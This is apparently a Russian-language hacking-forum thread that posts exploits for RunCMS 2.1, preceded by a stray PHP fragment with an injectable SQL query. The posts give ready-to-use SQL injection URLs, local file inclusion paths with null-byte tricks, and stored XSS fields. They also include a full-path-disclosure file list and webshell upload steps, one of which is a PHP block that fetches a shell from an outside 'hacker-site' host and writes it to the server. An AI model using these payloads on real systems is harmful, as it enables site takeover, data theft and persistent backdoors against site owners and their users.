$category = urldecode($category);
$table = $db->prefix()."_mareviews";
/*
* Set display title
*/
$box_title = $category." - Reviews";
$content = "<table>";
$sql = "
SELECT title, author, id
FROM $table
WHERE category = '$category'
ORDER BY author, title";
$result = $db->query($sql);
Player#1
08.04.2010, 14:39
RunCMS 2.1
Active XSS
http://yoursite/edituser.php
Поле address varchar(150)
Поле town varchar(60)
Заливка шелла через админку
http://yoursite/modules/system/admin.php?fct=tpleditor
Заливаем zip архив с шеллом.
Шелл будет залит сюда: http://yoursite/themes/shell.php
---------------------------------------------------------
http://yoursite/modules/system/admin.php?fct=blocksadmin
Добавляем новый блок:
Content - сюда вставляем инклюд шелла, например:
$str = file_get_contents("http://hacker-site/shell.txt");
$fp = fopen("shell.php", "w+t");
fwrite($fp, $str);Content Type - PHP Script
Заходим на страницу содержащую блок или смотрим его preview.
Шелл будет залит сюда: http://yoursite/modules/system/shell.php
Player#1 (c)
.:[melkiy]:.
13.05.2010, 15:19
Run CMS 2.1
www.runcms.org
SQL-Injection
file:/modules/forum/reply.php
include_once("class/class.forumposts.php");
$forumpost = new ForumPosts($post_id);
file:/modules/forum/class/class.forumposts.php
function ForumPosts($id=-1) {
if ( is_array($id) ) {
$this->makePost($id);
} elseif ( $id != -1 ) {
$this->getPost($id);
}
}
...
function getPost($id) {
...
$sql = "SELECT * FROM ".$bbTable['posts']." WHERE post_id=$id";
$array = $db->fetch_array($db->query($sql));
...
result:
GET /modules/forum/reply.php?forum=3&post_id=-4+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0
LFI
need: administrator account, mq=off
/modules/system/admin.php?fct=tpleditor&op=file_edit&module=../../../[local_file]%00
/modules/system/admin.php?fct=tpleditor&op=css_edit&module=../../[local_file]%00
/modules/system/admin.php?fct=tpleditor&op=tpl_module_edit&module=../../[local_file]%00&tpl=1
Full Path Disclosure
/footer.php
/header.php
/class/core.php
/class/groupaccess.php
/class/rcxblock.php
/class/rcxcomments.php
/class/rcxformloader.php
/class/rcxgroup.php
/class/rcxpm.php
/class/rcxstory.php
/class/rcxtopic.php
/class/rcxuser.php
/class/database/mysql.php
/class/form/formbutton.php
/class/form/formcheckbox.php
/class/form/formdatetime.php
/class/form/formdhtmleseditor.php
/class/form/formdhtmlfckeditor.php
/class/form/formdhtmltextarea.php
/class/form/formelementtray.php
/class/form/formfile.php
/class/form/formheadingrow.php
/class/form/formhidden.php
/class/form/formlabel.php
/class/form/formpassword.php
/class/form/formradio.php
/class/form/formradioyn.php
/class/form/formselect.php
/class/form/formselectcountry.php
/class/form/formselectgroup.php
/class/form/formselectlang.php
/class/form/formselectmatchoption.php
/class/form/formselectmodule.php
/class/form/formselecttheme.php
/class/form/formselecttimezone.php
/class/form/formselectuser.php
/class/form/formtext.php
/class/form/formtextarea.php
/class/form/formtextdateselect.php
/class/form/simpleform.php
/class/form/tableform.php
/class/form/themeform.php
upload shell
need: administrator account
Логинимся.. Идём в System Admin -> Theme Editor -> архивируем шелл (*.zip) -> жмём upload
шелл будет доступен по адресу http://site.ru/themes/shell.php
.:[melkiy]:.
13.05.2010, 18:21
Run CMS 2.1
SQL-Injection
need:user account
file:/modules/pm/print.php
if ( isset($_POST['op']) ) {
$op = $_POST['op'];
} elseif ( isset($_GET['op']) ) {
$op = $_GET['op'];
}
if ( isset($_POST['msg_id']) ) {
$msg = $_POST['msg_id'];
} elseif ( isset($_GET['msg_id']) ) {
$msg = $_GET['msg_id'];
}
if (empty($msg)) {
redirect_header("index.php", 2, _PM_NOPNTOPRINT);
exit();
}
if ($op == "print_pn") {
$sql = "SELECT msg_id, subject, from_userid, to_userid, msg_time, msg_text FROM ".$db->prefix("pm_msgs")." WHERE msg_id=".$msg." ";
}
if ($op == 'print_sent_pn') {
$sql = "SELECT msg_id, subject, from_userid, to_userid, msg_time, msg_text FROM ".$db->prefix("pm_msgs_sent")." WHERE msg_id=".$msg."";
}
result:
/modules/pm/print.php?op=print_pn&msg_id=-0+union+select+1,2,3,4,5,6
--------------
/modules/forum/edit.php?forum=1&post_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0
/modules/galleri/viewcat.php?cid=-1+union+select+1,version()
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot